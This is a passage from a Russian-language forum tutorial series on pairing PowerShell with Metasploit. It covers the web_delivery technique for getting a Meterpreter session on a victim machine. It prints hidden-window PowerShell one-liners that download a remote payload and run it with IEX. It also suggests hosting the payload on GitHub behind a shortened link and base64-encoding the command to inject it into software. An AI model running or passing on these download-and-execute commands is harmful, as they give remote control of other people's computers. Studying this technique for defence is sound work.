Часть 4
Предыдущая частьСледующая часть
Все части
Сегодня подготовительная статья на тему возможности PowerShell с точки зрение ИБ, на которою я еще буду ссылаться в дальнейших постах. Речь пойдет сегодня от технике Web Delivery - Доставка Полезной нагрузки через Web. Как вы заметили , я стараюсь в своих статьях придерживаться связки PowerShell+Metasploit. И в этой статье я также буду демонстрировать технику доставки полезной нагрузки для получение метерпретер сессии в метасплоите. И так давайте начнем.
Прежде чем начну,хочу заметить что мой скрипт Power_Meter,который я использовал в прошлых статьях так же работает по принципу веб деливери.
Для начала давайте посмотрим как это работает:
Запустим метасплоит,поищим по ключевому слову web_delivery
Посмотрим описания эксплойта:
Из описания узнаем для себя базовые опции,кем написан был еще в 2013 году и сплойт этот работает на платформах где есть или Python или PHP или PowerShell, ну мы же конечно посмотрим его на примере с PowerShell. Так же видим в описании что при запуске стартует простенький вебсервер который хранит на себе полезную нагрузку и генерирует команду для запуска этой полезной нагрузки в зависимости от языка программирования которые мы выберем командой set target
Ну что же , давайте зададим необходимые параметры и запустим наш эксплоит.
Как видим у нас поднялся простенький веб сервер с полезной нагрузкой по адресу
и выдал нам на вывод команду для подгрузки этой полезной нагрузкиСсылка скрыта от гостей
powershell.exe -nop -w hidden -c $h=new-object net.webclient;$h.proxy=[Net.WebRequest]::GetSystemWebProxy();$h.Proxy.Credentials=[Net.CredentialCache]:: DefaultCredentials;IEX $h.downloadstring('Ссылка скрыта от гостей
Что же,для демонстрации просто запустим данную команду на стороне жертвы:
Как видим все тривиально просто) Команда подгрузила полезную нагрузку из удаленного веб сервера)
Круто)
Но зачем нам каждый раз поднимать веб сервер для хранение полезной нагрузки?
Давайте положим полезную нагрузку где то на гитхабе.
Сперва сначала давайте скачаем содержимое нагрузки:
Скопируем содержимое полезной нагрузки и разместим где то на гитхабе и сократим ссылку через
Ссылка скрыта от гостей
:Затем,мы уже поняли как работает принцип веб деливер используем следующую команду для компрометации жертвы:
powershell.exe -nop -w hidden IEX (New-Object Net.WebClient).downloadstring('
-w hidden (window hidden ) -- скрыть окно запуска
-NoP (No Profile) -- не использовать профиль PowerShell
IEX (New-Object Net.WebClient).downloadstring('
Как видим команда намного короче а результат тот же
Для удобства и инжекта в какое то ПО можно перегнать в base64 формат нашу команду)
Как видим результат тот же)
В общем на этом пока все) Надеюсь смысл техники доставки полезной нагрузки более менее понятен)
Если возникнут трудности - задавайте вопросы в комментариях - постараюсь ответить)
Всем спасибо) Если понравилась статья - жмакни лайк )
Предыдущая часть
Следующая часть
Все части
Последнее редактирование: